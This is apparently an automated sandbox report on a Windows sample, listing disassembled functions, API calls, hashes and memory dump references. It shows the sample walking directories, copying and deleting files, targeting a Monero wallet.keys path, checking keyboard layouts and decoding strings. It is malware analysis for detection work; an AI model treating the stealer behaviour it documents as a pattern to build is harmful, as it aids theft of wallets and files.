                  • StrCmpCA.SHLWAPI(?,0030525C), ref: 002E1973
                  • StrCmpCA.SHLWAPI(?,00305304), ref: 002E1989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002E1D40
                  • DeleteFileA.KERNEL32(00000000), ref: 002E1DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002E1E20
                  • FindClose.KERNEL32(000000FF), ref: 002E1E32
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  • Opcode ID: f54f9b8f92fc5c693fb60fa9c501e26a6df7b49d2310b024b941e68b10c28d20
                  • Instruction ID: c037eff36c5f03fd22faa9a51cc1ca5d51e447b12eca1bf4d429d96b3976cd7e
                  • Opcode Fuzzy Hash: f54f9b8f92fc5c693fb60fa9c501e26a6df7b49d2310b024b941e68b10c28d20
                  • Instruction Fuzzy Hash: 9E12E3B192111C9BDB15EB60CC56AFEB378AF54780F4041B9A60E62091EF706F99CF91
                  Function 002EDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00300C2E), ref: 002EDE5E
                  • StrCmpCA.SHLWAPI(?,003014C8), ref: 002EDEAE
                  • StrCmpCA.SHLWAPI(?,003014CC), ref: 002EDEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002EE3E0
                  • FindClose.KERNEL32(000000FF), ref: 002EE3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  • Opcode ID: 35a740134a5e8fecdd654467a60ff6797c2f2aade9b38c4972da5d96a8ad6d63
                  • Instruction ID: 1d71b931798b2ba7a84ede27759f350fb0bf0591903587f3198e64e3b5ae4dc8
                  • Opcode Fuzzy Hash: 35a740134a5e8fecdd654467a60ff6797c2f2aade9b38c4972da5d96a8ad6d63
                  • Instruction Fuzzy Hash: A1F18FB183411D9ADB25EB60CC96EFEB378AF14780F8041B9A50E62095EF706B5ACE51
                  Function 002EDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003014B0,00300C2A), ref: 002EDAEB
                  • StrCmpCA.SHLWAPI(?,003014B4), ref: 002EDB33
                  • StrCmpCA.SHLWAPI(?,003014B8), ref: 002EDB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002EDDCC
                  • FindClose.KERNEL32(000000FF), ref: 002EDDDE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: fe827e04ed939d515771c945585d29274ba05c9f4b3f2472154f5115325f087a
                  • Instruction ID: cc888fda876a46704b6b56c1d46ce6eaca426b813b9dfa52c8e92d557ded06d8
                  • Opcode Fuzzy Hash: fe827e04ed939d515771c945585d29274ba05c9f4b3f2472154f5115325f087a
                  • Instruction Fuzzy Hash: 149167B292010897CB14FB70DC56DFDB37DAF94340F408678F90A96195EE74AB298F92
                  Function 006B71E4 Relevance: 11.6, Strings: 8, Instructions: 1601COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: i_z$8oYw$@T_~$_\Zk$`h}$lh}$r~$n;{
                  • API String ID: 0-1618385194
                  • Opcode ID: 408246dbac172228eacc6babe773573947c09b8d99deb7161da2605a9055ac2d
                  • Instruction ID: a7ff3e87dc85bdeeb82e3ed1c26906b7363d829d1fc72479ac662f2b27c707af
                  • Opcode Fuzzy Hash: 408246dbac172228eacc6babe773573947c09b8d99deb7161da2605a9055ac2d
                  • Instruction Fuzzy Hash: C2B2F7F360C6049FE304AE2DEC8567ABBE9EF94720F16893DEAC4C7744E63558018697
                  Function 006B569E Relevance: 11.6, Strings: 8, Instructions: 1575COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: +>gm$8mW$<f^_$By:$hb7$o!m/$rI>m${{
                  • API String ID: 0-1382604001
                  • Opcode ID: 3627b7cf5fc5baa4e3a1822640cc78f98c564c71c6a46a32c0a64d672335fdee
                  • Instruction ID: 93dc53d2f3c8f9b20d0301f675ad25869ab0e60951bcd4c91b24214a63509a63
                  • Opcode Fuzzy Hash: 3627b7cf5fc5baa4e3a1822640cc78f98c564c71c6a46a32c0a64d672335fdee
                  • Instruction Fuzzy Hash: 08B2F4F360C2049FE3046E29EC8567AFBE9EF94720F16893DEAC487744EA3558418797
                  Function 002F7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,003005AF), ref: 002F7BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 002F7BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 002F7C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 002F7C62
                  • LocalFree.KERNEL32(00000000), ref: 002F7D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  • Opcode ID: 604367bb2d4cf10c41dfe80fd00f2ad3b1f9fb6104755337c096ca75a19bf085
                  • Instruction ID: a34e14854b09396f942204630af2dbe66b3bffe3820d0ca6ca9a22a46c95b682
                  • Opcode Fuzzy Hash: 604367bb2d4cf10c41dfe80fd00f2ad3b1f9fb6104755337c096ca75a19bf085
                  • Instruction Fuzzy Hash: A6414AB192111CABDB24DB54DC99BFDF374EF54740F2041A9E20A62190DB742F95CFA1
                  Function 006AEC3B Relevance: 10.3, Strings: 7, Instructions: 1549COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ,e?$T{{$W}T{$\);Y$f1[?$xA-$zw
                  • API String ID: 0-3163517618
                  • Opcode ID: b63b63a57caf3465324aaa28064a334c4f8d6211aee523cfaf3ce3cf6df8b336
                  • Instruction ID: 5d2100e47ce1391f71552d22bba20fd3ad1b855030a57cd335aba85d78c13611
                  • Opcode Fuzzy Hash: b63b63a57caf3465324aaa28064a334c4f8d6211aee523cfaf3ce3cf6df8b336
                  • Instruction Fuzzy Hash: 70B2E6F390C204AFE3046E2DEC8566AFBE5EF94720F1A493DEAC4C3744E63598158697
                  Function 002EE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00300D73), ref: 002EE4A2
                  • StrCmpCA.SHLWAPI(?,003014F8), ref: 002EE4F2
                  • StrCmpCA.SHLWAPI(?,003014FC), ref: 002EE508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002EEBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: 94931322381c07e0a0c697c2a429957a834b7fa264b9de774c5c88b8fe07be82
                  • Instruction ID: 8a1f52c6fb8a46730cb133859b950a3bbe5f01db43e3c745b38f634d910a0bb6
                  • Opcode Fuzzy Hash: 94931322381c07e0a0c697c2a429957a834b7fa264b9de774c5c88b8fe07be82
                  • Instruction Fuzzy Hash: CE1231B192011C9ADB15FB60DC96EFDB338AF54780F4041B8B60E96095EE706F69CF92
                  Function 006BC23D Relevance: 9.1, Strings: 6, Instructions: 1636COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: )[Tn$0wx$F0_~$w;K$8{y$mO
                  • API String ID: 0-1004035091
                  • Opcode ID: aaefebd9b1545668d6d61da3c5d9256461f2846d6febf4bf09a92b7b8b15a86b
                  • Instruction ID: b25c40e62d445ddfd62c657b2f56c99edb65ba809999aa4de0616ddd7ef14d77
                  • Opcode Fuzzy Hash: aaefebd9b1545668d6d61da3c5d9256461f2846d6febf4bf09a92b7b8b15a86b
                  • Instruction Fuzzy Hash: E4B2E7F3A08204AFE314AE2DEC8577ABBE5EF94720F1A493DE6C4C3744E63558058697
                  Function 006B06E3 Relevance: 8.9, Strings: 6, Instructions: 1449COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: #E:}$+_-($WQsX$m5}{$wMi$I#9
                  • API String ID: 0-836572290
                  • Opcode ID: 32b71fa010174552883d43e8ed6beeab45eff3224e7a1008c4620b28ff4dbf53
                  • Instruction ID: 23f87acc7af7e226a218509567415d25c8d86844931873970e56dded1612107f
                  • Opcode Fuzzy Hash: 32b71fa010174552883d43e8ed6beeab45eff3224e7a1008c4620b28ff4dbf53
                  • Instruction Fuzzy Hash: D5A2D1F290C2009FE714AF29EC8567ABBE5EF94320F1A493DEAC4C3340E63558558797
                  Function 002E9AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                  Download Yara Rule
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N.,00000000,00000000), ref: 002E9AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,002E4EEE,00000000,?), ref: 002E9B01
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N.,00000000,00000000), ref: 002E9B2A
